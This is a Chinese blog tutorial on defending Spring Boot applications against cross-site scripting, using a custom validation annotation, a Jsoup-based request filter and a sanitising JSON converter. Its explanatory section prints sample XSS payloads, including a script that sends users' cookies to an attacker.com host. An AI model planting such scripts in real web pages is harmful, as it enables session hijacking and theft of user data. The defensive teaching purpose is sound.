首页 > 其他分享 >发现 XSS 漏洞?别急,用这招 SpringBoot 技巧轻松搞定!

发现 XSS 漏洞?别急,用这招 SpringBoot 技巧轻松搞定!

时间:2024-08-31 18:57:47浏览次数:10  
标签:XSS return SpringBoot value 这招 过滤器 public String

XSS攻击是指攻击者在Web页面的输入数据中插入恶意脚本,当其他用户浏览该页面时,这些脚本就会在用户的浏览器上执行。

由于脚本是在受害用户的上下文中执行的,因此它可以访问该用户的所有会话信息和权限,从而可能导致信息泄露、会话劫持、恶意操作等安全风险。

1.2 XSS攻击的类型

XSS攻击主要分为以下三种类型:

  • 存储型XSS(Persistent XSS): 恶意脚本被永久存储在目标服务器上,如数据库、消息论坛、访客留言等,当用户访问相应的网页时,恶意脚本就会执行。
  • 反射型XSS(Reflected XSS): 恶意脚本并不存储在目标服务器上,而是通过诸如URL参数的方式直接在请求响应中反射并执行。这种类型的攻击通常是通过诱使用户点击链接或访问特定的URL来实施的。
  • 基于DOM的XSS(DOM-based XSS): 这种类型的XSS攻击完全发生在客户端,不需要服务器的参与。它通过恶意脚本修改页面的DOM结构,实现攻击。
1.3 XSS攻击的攻击原理及示例

XSS攻击的基本原理是利用Web应用程序对用户输入的信任,将恶意脚本注入到响应中。当其他用户访问包含恶意脚本的页面时,脚本会在他们的浏览器中执行。

示例:

  • 存储型XSS攻击:

攻击者在一个博客评论系统中提交以下评论:

<script>
  document.location='http://attacker.com/steal.php?cookie='+document.cookie;
</script>

当其他用户查看这条评论时,他们的cookie会被发送到攻击者的服务器。

  • 反射型XSS攻击:

攻击者构造一个恶意URL:

http://example.com/search?q=<script>alert('XSS')</script>

如果服务器直接将搜索词嵌入到响应中而不进行过滤,用户点击此链接后会看到一个警告框。

  • DOM型XSS攻击:

假设网页中有以下JavaScript代码:

var name = document.location.hash.substr(1);
document.write("欢迎, " + name);

攻击者可以构造如下URL:

http://example.com/page.html#<script>alert('XSS')</script>

当用户访问此URL时,恶意脚本会被执行。

二、Spring Boot中的XSS防御手段

在Spring Boot中,我们可以采用多种方式来防御XSS攻击。下面将详细介绍两种常用的防御手段:使用注解和使用过滤器。

2.1 使用注解进行XSS防御

注解是一种轻量级的防御手段,它可以在方法或字段级别对输入进行校验,从而防止XSS攻击。

2.1.1 引入相关依赖

<!--JSR-303/JSR-380用于验证的注解 -->
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-validation</artifactId>
    <version>3.2.0</version>
</dependency>

2.1.2 使用@XSS注解进行参数校验

我们可以自定义一个@XSS注解,用于标记那些需要校验的参数。这里是一个简单的@XSS注解定义:

@Target(value = { ElementType.METHOD, ElementType.FIELD, ElementType.CONSTRUCTOR, ElementType.PARAMETER })
@Retention(RetentionPolicy.RUNTIME)
@Constraint(validatedBy = XssValidator.class)
public @interface Xss {
    String message() default "非法输入, 检测到潜在的XSS";
    Class<?>[] groups() default {};
    Class<? extends Payload>[] payload() default {};
}

2.1.3 实现自定义注解处理器

接下来,我们需要实现XSSValidator类,该类将负责检查输入是否包含潜在的XSS攻击脚本:

public class XssValidator implements ConstraintValidator<Xss, String> {
    /**
     * 使用自带的 basicWithImages 白名单
     */
    private static final Safelist WHITE_LIST = Safelist.relaxed();
    /**
     * 定义输出设置,关闭prettyPrint(prettyPrint=false),目的是避免在清理过程中对代码进行格式化
     * 从而保持输入和输出内容的一致性。
     */
    private static final Document.OutputSettings OUTPUT_SETTINGS = new Document.OutputSettings().prettyPrint(false);

    /**
     * 验证输入值是否有效,即是否包含潜在的XSS攻击脚本。
     * 
     * @param value 输入值,需要进行XSS攻击脚本清理。
     * @param context 上下文对象,提供关于验证环境的信息,如验证失败时的错误消息定制。
     * @return 如果清理后的值与原始值相同,则返回true,表示输入值有效;否则返回false,表示输入值无效。
     */
    @Override
    public boolean isValid(String value, ConstraintValidatorContext context) {
        // 使用Jsoup库对输入值进行清理,以移除潜在的XSS攻击脚本。
        // 使用预定义的白名单和输出设置来确保只保留安全的HTML元素和属性。
        String cleanedValue = Jsoup.clean(value, "", WHITE_LIST, OUTPUT_SETTINGS);
        
        // 比较清理后的值与原始值是否相同,用于判断输入值是否有效。
        return cleanedValue.equals(value);
    }

}

2.1.4 使用注解

在要进行XSS防御的属性上添加注解:

@Data
@Tag(name = "用户",description = "用户登录类")
public class UserLoginDTO {

    @Xss
    @NotBlank(message = "账号不能为空")
    @Schema(name = "用户账号",type = "String")
    private String userAccount;

    @Xss
    @Size(min = 6, max = 18, message = "用户密码长度需在6-18位")
    @Schema(name = "用户密码",type = "String")
    private String password;

    @Xss
    @NotBlank(message = "邮箱验证码内容不能为空")
    @Schema(name = "邮箱验证码",type = "String")
    private String emailCaptcha;
}

Controller中的接口添加@Validated注解:

@PostMapping("/test2")
public Result<String> login(@RequestBody  @Validated UserLoginDTO userLoginDTO) {
    return Result.success();
}
2.2 使用过滤器进行XSS防御

2.2.1 引入相关依赖

<!-- Jsoup依赖 -->
<dependency>
   <groupId>org.jsoup</groupId>
   <artifactId>jsoup</artifactId>
   <version>1.17.2</version>
</dependency>

2.2.2 编写配置类

/**
 * 跨站脚本(XSS)过滤配置类。
 */
@Data
@Component
@ConfigurationProperties(prefix = "xss")
public class FilterConfig {
    /**
     * 是否启用XSS过滤。
     */
    private String enabled;

    /**
     * 需要排除的URL模式,这些URL不会进行XSS过滤。
     */
    private String excludes;

    /**
     * 需要应用XSS过滤的URL模式。
     */
    private String urlPatterns;

    /**
     * 注册XSS过滤器。
     *
     * @return FilterRegistrationBean 用于注册过滤器的bean。
     */
    @Bean
    public FilterRegistrationBean xssFilterRegistration() {
        FilterRegistrationBean registrationBean = new FilterRegistrationBean();
        // 设置过滤器的分发类型为请求类型
        registrationBean.setDispatcherTypes(DispatcherType.REQUEST);
        // 创建XssFilter的实例
        registrationBean.setFilter(new XssFilter());
        // 添加过滤器需要拦截的URL模式,这些模式从配置文件中的"urlPatterns"属性读取
        registrationBean.addUrlPatterns(StringUtils.split(urlPatterns, ","));
        // 设置过滤器的名称
        registrationBean.setName("XssFilter");
        // 设置过滤器的执行顺序,数值越小,优先级越高
        registrationBean.setOrder(9999);
        // 创建一个Map,用于存储过滤器的初始化参数
        Map<String, String> initParameters = new HashMap<>();
        // 将配置文件中的"excludes"属性设置到过滤器的初始化参数中
        initParameters.put("excludes", excludes);
        // 将配置文件中的"enabled"属性设置到过滤器的初始化参数中
        initParameters.put("enabled", enabled);
        // 将初始化参数设置到FilterRegistrationBean中
        registrationBean.setInitParameters(initParameters);
        // 返回FilterRegistrationBean,包含了XssFilter的配置信息
        return registrationBean;
    }
}

2.2.3 修改配置文件

xss:
  enabled: true
  excludes:
  url-patterns: /*

2.2.4 创建XSSFilter类

import jakarta.servlet.*;
import jakarta.servlet.http.HttpServletRequest;
import jakarta.servlet.http.HttpServletResponse;
import lombok.extern.slf4j.Slf4j;
import org.apache.commons.lang3.StringUtils;

import java.io.IOException;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

@Slf4j
public class XssFilter implements Filter {
    /**
     * 存储需要排除XSS过滤的URL模式列表。
     */
    private List<String> excludes = new ArrayList<>();

    /**
     * 是否启用XSS过滤的标志。
     */
    private boolean enabled = false;

    /**
     * 初始化过滤器,从过滤器配置中读取排除列表和启用状态。
     *
     * @param filterConfig 过滤器配置对象。
     * @throws ServletException 如果初始化过程中出现错误。
     */
    @Override
    public void init(FilterConfig filterConfig) throws ServletException {
        String strExcludes = filterConfig.getInitParameter("excludes");
        String strEnabled = filterConfig.getInitParameter("enabled");
        //将不需要xss过滤的接口添加到列表中
        if (StringUtils.isNotEmpty(strExcludes)) {
            String[] urls = strExcludes.split(",");
            for (String url : urls) {
                excludes.add(url);
            }
        }
        if (StringUtils.isNotEmpty(strEnabled)) {
            enabled = Boolean.valueOf(strEnabled);
        }
    }

    /**
     * 执行过滤逻辑,如果当前请求不在排除列表中,则通过XSS过滤器包装请求。
     *
     * @param request  HTTP请求对象。
     * @param response HTTP响应对象。
     * @param chain    过滤器链对象,用于继续或中断请求处理。
     * @throws IOException      如果处理过程中出现I/O错误。
     * @throws ServletException 如果处理过程中出现Servlet相关错误。
     */
    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpServletResponse resp = (HttpServletResponse) response;
        //如果该访问接口在排除列表里面则不拦截
        if (isExcludeUrl(req.getServletPath())) {
            chain.doFilter(request, response);
            return;
        }

        log.info("uri:{}", req.getRequestURI());
        // xss 过滤
        chain.doFilter(new XssWrapper(req), resp);
    }

    /**
     * 销毁过滤器,释放资源。
     */
    @Override
    public void destroy() {
        // 无需额外的销毁逻辑
    }

    /**
     * 判断当前请求的URL是否应该被排除在XSS过滤之外。
     *
     * @param urlPath 请求的URL路径。
     * @return 如果请求应该被排除,则返回true;否则返回false。
     */
    private boolean isExcludeUrl(String urlPath) {
        if (!enabled) {
            //如果xss开关关闭了,则所有url都不拦截
            return true;
        }
        if (excludes == null || excludes.isEmpty()) {
            return false;
        }

        String url = urlPath;
        for (String pattern : excludes) {
            Pattern p = Pattern.compile("^" + pattern);
            Matcher m = p.matcher(url);
            if (m.find()) {
                return true;
            }
        }
        return false;
    }
}

2.2.5 编写过滤工具类

/**
 * XSS过滤工具类,使用Jsoup库对输入的字符串进行XSS攻击防护
 */
public class XssUtil {

    /**
     * 使用自带的 basicWithImages 白名单
     */
    private static final Safelist WHITE_LIST = Safelist.relaxed();
    /**
     * 定义输出设置,关闭prettyPrint(prettyPrint=false),目的是避免在清理过程中对代码进行格式化
     * 从而保持输入和输出内容的一致性。
     */
    private static final Document.OutputSettings OUTPUT_SETTINGS = new Document.OutputSettings().prettyPrint(false);
    
    /*
      初始化白名单策略,允许所有标签拥有style属性。
      这是因为在富文本编辑中,样式通常通过style属性来定义,需要确保这些样式能够被保留。
     */
    static {
        // 富文本编辑时一些样式是使用 style 来进行实现的
        // 比如红色字体 style="color:red;"
        // 所以需要给所有标签添加 style 属性
        WHITE_LIST.addAttributes(":all", "style");
    }
    
    /**
     * 清理输入的字符串,移除潜在的XSS攻击代码。
     * 
     * @param content 待清理的字符串,通常是用户输入的HTML内容。
     * @return 清理后的字符串,保证不包含XSS攻击代码。
     */
    public static String clean(String content) {
        // 使用定义好的白名单策略和输出设置清理输入的字符串
        return Jsoup.clean(content, "", WHITE_LIST, OUTPUT_SETTINGS);
    }
}

2.2.6 编写XSSRequestWrapper类清理脚本

XSSFilter类中,我们创建了一个新的XSSRequestWrapper类,该类继承自HttpServletRequestWrapper。在这个包装类中,我们将重写getParameter等方法,以清理请求参数中的潜在XSS脚本。

@Slf4j
public class XssWrapper extends HttpServletRequestWrapper {
    /**
     * Constructs a request object wrapping the given request.
     *
     * @param request The request to wrap
     * @throws IllegalArgumentException if the request is null
     */
    public XssWrapper(HttpServletRequest request) {
        super(request);
        log.info("XssWrapper");
    }

    /**
     * 对数组参数进行特殊字符过滤
     */
    @Override
    public String[] getParameterValues(String name) {
        String[] values = super.getParameterValues(name);
        if (values == null) {
            return null;
        }
        int count = values.length;
        String[] encodedValues = new String[count];
        for (int i = 0; i < count; i++) {
            encodedValues[i] = cleanXSS(values[i]);
        }
        return encodedValues;
    }

    /**
     * 对参数中特殊字符进行过滤
     */
    @Override
    public String getParameter(String name) {
        String value = super.getParameter(name);
        if (StrUtil.isBlank(value)) {
            return value;
        }
        return cleanXSS(value);
    }

    /**
     * 获取attribute,特殊字符过滤
     */
    @Override
    public Object getAttribute(String name) {
        Object value = super.getAttribute(name);
        if (value instanceof String && StrUtil.isNotBlank((String) value)) {
            return cleanXSS((String) value);
        }
        return value;
    }

    /**
     * 对请求头部进行特殊字符过滤
     */
    @Override
    public String getHeader(String name) {
        String value = super.getHeader(name);
        if (StrUtil.isBlank(value)) {
            return value;
        }
        return cleanXSS(value);
    }

    /**
     * 清理输入的字符串以防止XSS攻击
     *
     * @param value 待清理的字符串,通常为用户输入或来自不可信源的数据。
     * @return 清理后的字符串,移除了可能的XSS攻击代码。
     */
    private String cleanXSS(String value) {
        return XssUtil.clean(value);
    }
}

2.2.7 自定义json消息解析器

在使用springboot中,类似于普通的参数parameterattributeheader一类的,可以直接使用过滤器来过滤。而前端发送回来的json字符串就没那么方便过滤了。可以考虑用自定义json消息解析器来过滤前端传递的json。

/**
 * 在读取和写入JSON数据时特殊字符避免xss攻击的消息解析器
 *
 */
public class XSSMappingJackson2HttpMessageConverter extends MappingJackson2HttpMessageConverter {

    /**
     * 从HTTP输入消息中读取对象,同时应用XSS防护。
     * 
     * @param type        类型令牌,表示要读取的对象类型。
     * @param contextClass    上下文类,提供类型解析的上下文信息。
     * @param inputMessage HTTP输入消息,包含要读取的JSON数据。
     * @return 从输入消息中解析出的对象,经过XSS防护处理。
     * @throws IOException 如果发生I/O错误。
     * @throws HttpMessageNotReadableException 如果消息无法读取。
     */
    @Override
    public Object read(Type type, Class contextClass,
                       HttpInputMessage inputMessage) throws IOException,
            HttpMessageNotReadableException {
        JavaType javaType = getJavaType(type, contextClass);
        Object obj = readJavaType(javaType, inputMessage);
        //得到请求json
        String json = super.getObjectMapper().writeValueAsString(obj);
        //过滤特殊字符
        String result = XssUtil.clean(json);
        Object resultObj = super.getObjectMapper().readValue(result, javaType);
        return resultObj;
    }

    /**
     * 从HTTP输入消息中读取指定Java类型的对象,内部使用。
     * 
     * @param javaType    要读取的对象的Java类型。
     * @param inputMessage HTTP输入消息,包含要读取的JSON数据。
     * @return 从输入消息中解析出的对象。
     * @throws IOException 如果发生I/O错误。
     * @throws HttpMessageNotReadableException 如果消息无法读取。
     */
    private Object readJavaType(JavaType javaType, HttpInputMessage inputMessage) {
        try {
            return super.getObjectMapper().readValue(inputMessage.getBody(), javaType);
        } catch (IOException ex) {
            throw new HttpMessageNotReadableException("Could not read JSON: " + ex.getMessage(), ex);
        }
    }

    /**
     * 将对象写入HTTP输出消息,同时应用XSS防护。
     * 
     * @param object 要写入的对象。
     * @param outputMessage HTTP输出消息,对象将被序列化为JSON并写入此消息。
     * @throws IOException 如果发生I/O错误。
     * @throws HttpMessageNotWritableException 如果消息无法写入。
     */
    @Override
    protected void writeInternal(Object object, HttpOutputMessage outputMessage)
            throws IOException, HttpMessageNotWritableException {
        //得到要输出的json
        String json = super.getObjectMapper().writeValueAsString(object);
        //过滤特殊字符
        String result = XssUtil.clean(json);
        // 输出
        outputMessage.getBody().write(result.getBytes());
    }
}

然后在启动类添加:

@Bean
public HttpMessageConverters xssHttpMessageConverters() {
    XSSMappingJackson2HttpMessageConverter xssMappingJackson2HttpMessageConverter = new XSSMappingJackson2HttpMessageConverter();
    HttpMessageConverter converter = xssMappingJackson2HttpMessageConverter;
    return new HttpMessageConverters(converter);
}

三、测试

3.1 XSS注解:

如果不符合规则的字符(例如<script>alert('XSS');</script>)会提示非法输入,检测到潜在的XSS,可以看到下面的返回参数中的message已经变为默认警告。

发现 XSS 漏洞?别急,用这招 SpringBoot 技巧轻松搞定!_字符串

3.2 XSS过滤器

XSS过滤器实现的效果是过滤,将前端传递参数进行清理,达到XSS防御的目的。

观察下面的测试结果可以知道过滤器成功实现参数清理。

发现 XSS 漏洞?别急,用这招 SpringBoot 技巧轻松搞定!_初始化_02

发现 XSS 漏洞?别急,用这招 SpringBoot 技巧轻松搞定!_白名单_03

四、总结

本文深入探讨了在Spring Boot应用程序中如何有效地防御XSS攻击。我们介绍了两种主要的防御手段:使用注解和使用过滤器。

通过这两种方式,开发者可以轻松地在Spring Boot应用中实现XSS攻击的防御,从而保障用户的数据安全和应用的稳定运行,希望对大家有所帮助。

最后说一句(求关注!别白嫖!)

如果这篇文章对您有所帮助,或者有所启发的话,求一键三连:点赞、转发、在看。

关注公众号:woniuxgg,在公众号中回复:笔记  就可以获得蜗牛为你精心准备的java实战语雀笔记,回复面试、开发手册、有超赞的粉丝福利!





标签:XSS,return,SpringBoot,value,这招,过滤器,public,String
From: https://blog.51cto.com/u_16502039/11883336

相关文章

  • springboot安康学院新型冠状病毒肺炎疫情防控专题网站的设计与实现
    系统包含:源码+论文所用技术:SpringBoot+Vue+SSM+Mybatis+Mysql免费提供给大家参考或者学习,获取资料请私聊我目录第1章绪论 11.1选题动因 11.2目的和意义 11.3论文结构安排 2第2章开发环境与技术 32.1MYSQL数据库 32.2Tomcat介绍 32.3vue技术 42.4Sp......
  • 渗透测试基础-反射型XSS原理及实操
    只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力......
  • XSS漏洞
    XSS(跨站脚本攻击,Cross-SiteScripting)是一种常见的网络攻击方式,攻击者通过向网页中注入恶意脚本,使得这些脚本在其他用户的浏览器中执行。XSS漏洞通常出现在网站对用户输入的数据缺乏适当的验证和过滤,导致恶意代码被注入并执行。XSS漏洞的基本原理1:什么是XSS:XSS攻击的核心是,攻击......
  • 基于Springboot的城市垃圾分类管理系统
    博主介绍:java高级开发,从事互联网行业六年,熟悉各种主流语言,精通java、python、php、爬虫、web开发,已经做了多年的设计程序开发,开发过上千套设计程序,没有什么华丽的语言,只有实实在在的写点程序。......
  • 基于springboot+vue+uniapp的使命召唤游戏助手小程序
    开发语言:Java框架:springboot+uniappJDK版本:JDK1.8服务器:tomcat7数据库:mysql5.7(一定要5.7版本)数据库工具:Navicat11开发软件:eclipse/myeclipse/ideaMaven包:Maven3.3.9系统展示后台登录界面管理员主界面玩家管理游戏分类管理道具种类管理游戏道具管理战绩信息管理......
  • (2024最新毕设合集)基于SpringBoot的校园设备维修管理系统-16364|可做计算机毕业设计JAV
    基于Springboot的校园设备维修管理系统的设计与实现摘 要基于Springboot的校园设备维修管理系统的设计与实现是一个结合了网络技术和信息管理的项目。该系统能满足校园报修管理的实际需求,通过网络进行信息管理,使得设备维修更加及时有效。本设计主要实现集人性化、高效率、......
  • SpringBoot SSM vue在线作业考试系统
    SpringBootSSMvue在线作业考试系统首页图片轮播作业信息通知公告登录注册留言板个人中心我的收藏后台管理登录注册个人中心教师信息管理学生信息管理学院信息管理专业信息管理班级信息管理作业信息管理作业提交管理通知公告管理试卷管理试题管理系统管理......
  • 【SpringBoot】分析 SpringBoot 中的扩展点
    1 前言SpringBoot它给我们留了很多的扩展点,这节我们就看看都有哪些(有的扩展点是基于Spring的,有的我就不具体强调到底是SpringBoot还是Spring的噢)。另外每一种扩展点我们都从两个方面来看:入口时机:入口就是SpringBoot解析或者寻找你自定义的类的时机执行时机:就是Spr......
  • SpringBoot项目初始化搭建
    SpringBoot项目搭建创建SpringBoot项目事务编程式事务声明式事务PageHelper主要特点:依赖使用常用方法跨域问题JSONP(JSONwithPadding)工作原理:代码示例CORS(Cross-OriginResourceSharing)工作原理:代码示例1,全局CORS配置2.使用SpringBoot3.使用Servlet过滤器......
  • springboot 接口接收参数的注解介绍(@RequestParam,@PathVariable,@RequestBody 等)
    springboot接收参数的注解介绍(使用方法)在SpringBoot中,接收参数的方式主要依赖于SpringMVC提供的注解。这些注解帮助你将HTTP请求中的参数绑定到控制器(Controller)方法的参数上。以下是一些常用的接收参数的注解:1.@RequestParam用法:用于将HTTP请求参数绑定到控制器的方......